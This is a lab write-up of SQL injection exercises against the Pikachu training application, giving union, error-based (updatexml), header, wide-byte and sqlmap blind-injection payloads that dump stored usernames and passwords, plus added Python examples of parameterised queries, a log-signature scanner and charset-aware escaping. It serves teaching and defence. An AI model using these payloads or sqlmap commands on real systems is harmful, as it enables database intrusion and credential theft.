*Pikachu*
*Numeric injection (POST)*
Start by capturing the request in Burp Suite (BP).
Order by 2#
2 columns
id=1 union select 1,2 #&submit=%E6%9F%A5%E8%AF%A2
id=1 union select 1,database() #&submit=%E6%9F%A5%E8%AF%A2
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu' #&submit=%E6%9F%A5%E8%AF%A2
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' #&submit=%E6%9F%A5%E8%AF%A2
id=1 union select 1,group_concat(username,'*',password) from users #&submit=%E6%9F%A5%E8%AF%A2
Obtained the account and password:
admin/123456
*String injection (GET)*
Entering 1' causes an error, so this is string-type injection.
?name=1'+order+by+2--+
?name=1'+order+by+3--+ (error)
Two columns
name=1'+union+select+1,2--+
name=1'+union+select+1,database()--+
name=1'+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema='pikachu'--+
name=1'+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema='pikachu'+and+table_name='users'--+&submit=%E6%9F%A5%E8%AF%A2
name=1'+union+select+1,group_concat(username,password)+from+users--+&submit=%E6%9F%A5%E8%AF%A2
Obtained the account and password.
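Why the single quote in name=1' breaks the query, and what closes the hole, shown as an added example (not code from the Pikachu project): the vulnerable lookup splices the name parameter into the SQL text, the hardened lookup binds it as a parameter. SQLite stands in for MySQL so the script runs offline; the users table and its two rows are constructed for the demo, and the payloads are the page's own (1' union select 1,2--+ and 1%df' or 1=1--+ after URL decoding, minus the wide-byte prefix).

```python
import sqlite3

# Constructed stand-in for the lab's users table (assumption: only the
# username and password column names are known from the writeup).
SAMPLE_USERS = [(1, "admin", "123456"), (2, "pikachu", "000000")]


def make_db() -> sqlite3.Connection:
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_concat(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable form: the name parameter is spliced into the SQL text,
    so a quote in the input ends the literal and the remainder is parsed
    as SQL (the '--' then comments out the trailing quote)."""
    sql = f"SELECT id, username FROM users WHERE username = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_param(conn: sqlite3.Connection, name: str) -> list:
    """Hardened form: the value is bound as a parameter. Quotes, 'union'
    and comment markers inside it are compared as data, never executed."""
    return conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The first payload is the union probe from the lab, the second the
    # 'or 1=1' tautology; both are harmless through the bound query.
    for payload in ("admin", "1' union select 1,2-- ", "1' or 1=1-- "):
        print(repr(payload))
        print("  concat ->", lookup_concat(db, payload))
        print("  param  ->", lookup_param(db, payload))
```

With the spliced query the union probe returns the injected row (1, 2) and the tautology returns every user; the bound query returns nothing for either payload because no username literally equals that string. In PHP the same separation is provided by PDO or mysqli prepared statements.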
*Search injection*
Capture the request in Burp.
Because this is search-type injection, the query uses like '%...%',
so the string is closed with %'.
Try 1%'
Error; add a comment:
displays normally.
1%'+order+by+3--+
1%'+order+by+4--+
The rest is the same as the string type.
name=1%'+union+select+1,2,3--+&submit=%E6%90%9C%E7%B4%A2
name=1%'+union+select+1,2,database()--+&submit=%E6%90%9C%E7%B4%A2
name=1%'+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='pikachu'--+&submit=%E6%90%9C%E7%B4%A2
name=1%'+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_schema='pikachu'+and+table_name='users'--+&submit=%E6%90%9C%E7%B4%A2
name=1%'+union+select+1,2,group_concat(username,password)+from+users--+&submit=%E6%90%9C%E7%B4%A2
Obtained the account and password.
*XX-type injection*
Capture the request in Burp and try entering 1'.
The error message contains a ).
Try entering 1')
and add a comment:
it closes correctly.
name=1')+order+by+2--+
name=1')+union+select+1,2--+
name=1')+union+select+1,database()--+
name=1')+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema='pikachu'--+
name=1')+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema='pikachu'+and+table_name='users'--+
name=1')+union+select+1,group_concat(username,'*',password)+from+users--+
Obtained the account and password.
*Insert/update injection*
Capture the registration request.
After entering 1', the error shows that the closing character should be '.
Try registering with an error-based injection:
username=1'+or+updatexml(1,concat(0x7e,database(),0x7e),1)+or'&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit
The rest is similar to before.
username=1'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema='pikachu'),0x7e),1)+or'&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit
username=1'+or+updatexml(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_schema='pikachu'+and+table_name='users'),0x7e),1)+or'&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit
username=1'+or+updatexml(1,concat(0x7e,(select+group_concat(username,'*',password)+from+users),0x7e),1)+or'&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit
Obtained the account and password.
*Delete injection*
Capture the request in Burp and try error-based injection.
id=59+or+updatexml(1,concat(0x7e,database(),0x7e),1)--+
id=59+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema='pikachu'),0x7e),1)--+
id=59+or+updatexml(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_schema='pikachu'+and+table_name='users'),0x7e),1)--+
id=59+or+updatexml(1,concat(0x7e,(select+group_concat(username,'*',password)+from+users),0x7e),1)--+
Obtained the account and password.
*HTTP header injection*
Log in as admin / 123456.
Capture the request in Burp.
The following page appears;
view it.
Try injecting in the User-Agent header,
using error-based injection:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0'or updatexml(1,concat(0x7e,database(),0x7e),1) or'
The rest is similar.
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0'or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),0x7e),1) or'
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users'),0x7e),1) or'
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0'or updatexml(1,concat(0x7e,(select group_concat(username,'*',password) from users),0x7e),1) or'
Obtained the account and password.
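Every payload family on this page (union/order by probes, information_schema enumeration, updatexml error extraction, the %df' prefix, and the same strings carried in User-Agent) leaves a recognisable trace in web server logs. The scanner below is an added example, not part of the original writeup or of Pikachu; the log lines are constructed in Apache combined format, the two blind-lab file names come from this page, and EXAMPLE_LAB.php is a placeholder path. It URL-decodes the request line before matching so that +/%27 encoding does not hide the signatures, while the wide-byte check is done on the raw text because decoding %df as UTF-8 would turn it into U+FFFD.

```python
import re
from urllib.parse import unquote_plus

# Signature families drawn from the payloads used across these labs.
# The second element says which view of the line the pattern is run on.
SIGNATURES = {
    "union_select": (re.compile(r"\bunion\s+(all\s+)?select\b", re.I), "decoded"),
    "schema_probe": (re.compile(r"\binformation_schema\.(tables|columns)\b", re.I), "decoded"),
    "error_based":  (re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I), "decoded"),
    "column_count": (re.compile(r"\border\s+by\s+\d+\b", re.I), "decoded"),
    "wide_byte":    (re.compile(r"%df(%27|')", re.I), "raw"),
}


def classify(line: str) -> list:
    """Return the sorted names of the signatures that fire on one log line."""
    decoded = unquote_plus(line, errors="replace")
    hits = []
    for name, (pattern, view) in SIGNATURES.items():
        if pattern.search(line if view == "raw" else decoded):
            hits.append(name)
    return sorted(hits)


def scan(lines) -> dict:
    """Map line index -> findings for every line that triggered a signature."""
    findings = {}
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            findings[i] = tags
    return findings


def log_line(request: str, user_agent: str) -> str:
    """Build one constructed Apache combined-format access log entry."""
    return (f'10.0.0.5 - - [01/Jan/2025:12:00:00 +0000] "{request}" '
            f'200 512 "-" "{user_agent}"')


BENIGN_UA = "Mozilla/5.0"
# User-Agent payload from the header lab above (updatexml error extraction).
INJECTED_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 "
               "Firefox/135.0' or updatexml(1,concat(0x7e,database(),0x7e),1) or'")

# Constructed sample log; %E6%9F%A5%E8%AF%A2 is the benign button text.
LOG_LINES = [
    log_line("GET /pikachu/vul/sqli/sqli_blind_b.php?name=1%27+union+select+1%2Cdatabase%28%29--+"
             "&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1", BENIGN_UA),
    # POST bodies (the numeric lab) are not in the access log at all.
    log_line("POST /pikachu/vul/sqli/EXAMPLE_LAB.php HTTP/1.1", BENIGN_UA),
    log_line("GET /pikachu/vul/sqli/EXAMPLE_LAB.php HTTP/1.1", INJECTED_UA),
    log_line("GET /pikachu/vul/sqli/EXAMPLE_LAB.php?name=1%df%27+order+by+2--+ HTTP/1.1", BENIGN_UA),
    log_line("GET /pikachu/vul/sqli/sqli_blind_t.php?name=alice&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1",
             BENIGN_UA),
]

if __name__ == "__main__":
    for idx, tags in scan(LOG_LINES).items():
        print(f"line {idx}: {', '.join(tags)}")
```

Two caveats the sample shows: the numeric lab's POST body never reaches the access log, so that family is only visible in a WAF, proxy or application log that records bodies; and the header lab is only caught because the log format records User-Agent, which many deployments truncate or omit. Boolean and time-based blind probes (the sqlmap runs below) are better spotted by request volume and response timing than by string signatures.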
*Boolean-based blind injection*
Inject with sqlmap:
sqlmap -u "http://192.168.100.129/pikachu/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch --dbs
Continue:
sqlmap -u "http://192.168.100.129/pikachu/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch -D pikachu --tables
sqlmap -u "http://192.168.100.129/pikachu/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch -D pikachu -T users --columns
sqlmap -u "http://192.168.100.129/pikachu/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch -D pikachu -T users -C username,password --dump
Obtained the account and password.
*Time-based blind injection*
Use sqlmap:
sqlmap -u "http://192.168.100.129/pikachu/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch --dbs
sqlmap -u "http://192.168.100.129/pikachu/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch -D pikachu --tables
sqlmap -u "http://192.168.100.129/pikachu/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch -D pikachu -T users --columns
sqlmap -u "http://192.168.100.129/pikachu/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch -D pikachu -T users -C username,password --dump
Obtained the account and password.
*Wide-byte injection*
Try adding %df in front of the '.
name=1%df'or 1=1--+
name=1%df'order by 2--+
name=1%df'order by 3--+
name=1%df'union select 1,2--+
name=1%df'union select 1,database()--+
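What the %df prefix actually does, as an added example that is not part of the writeup or of Pikachu: byte-wise escaping in the style of PHP's addslashes() puts a 0x5C backslash in front of the quote, but when the connection decodes the bytes as GBK the 0xDF 0x5C pair is consumed as one two-byte character and the quote is left bare. The same bytes read as UTF-8 keep the backslash. The defensive counterpart shown here (assumed, not the project's code) is to decode strictly in the declared charset and escape at the character level, which rejects the malformed 0xDF 0x27 sequence outright while still handling genuine GBK text; binding parameters, as in the earlier example, avoids the question entirely.

```python
def addslashes_bytes(raw: bytes) -> bytes:
    """Byte-wise escaping like PHP's addslashes(): backslash before
    ' " \\ and NUL. It knows nothing about multibyte charsets."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def as_seen_by(charset: str, escaped: bytes) -> str:
    """How the database sees the escaped bytes under a given connection charset."""
    return escaped.decode(charset, errors="replace")


def quote_is_escaped(charset: str, escaped: bytes) -> bool:
    """True if, after charset decoding, the quote is still preceded by a backslash."""
    return "\\'" in as_seen_by(charset, escaped)


def escape_for_charset(raw: bytes, charset: str) -> bytes:
    """Charset-aware escaping: decode strictly (malformed sequences are refused),
    escape at the character level, then re-encode. Assumed mitigation, shown
    for illustration; prepared statements remain the preferred fix."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError as exc:
        raise ValueError(f"input is not valid {charset}: {exc}") from exc
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset)


def rejects_malformed(raw: bytes, charset: str) -> bool:
    """Convenience wrapper: does the strict escaper refuse this input?"""
    try:
        escape_for_charset(raw, charset)
    except ValueError:
        return True
    return False


# The page's payload after URL decoding: "1", the lone lead byte 0xDF, a quote.
PAYLOAD = b"1\xdf'"

if __name__ == "__main__":
    escaped = addslashes_bytes(PAYLOAD)
    print("escaped bytes:", escaped.hex(" "))
    for cs in ("utf-8", "gbk"):
        print(f"{cs:6} sees {as_seen_by(cs, escaped)!r}; quote escaped: {quote_is_escaped(cs, escaped)}")
    print("strict GBK escaper rejects payload:", rejects_malformed(PAYLOAD, "gbk"))
    # A genuine GBK character followed by a quote is escaped correctly.
    print("valid GBK text:", escape_for_charset("中'".encode("gbk"), "gbk").hex(" "))
```

The decisive line is the GBK view: three characters, the middle one formed from 0xDF 0x5C, and a bare quote at the end. This is why the lab payloads only work when the application escapes byte-wise but talks to MySQL with a GBK connection charset; keeping the escaping function and the connection charset consistent (or binding parameters) closes it.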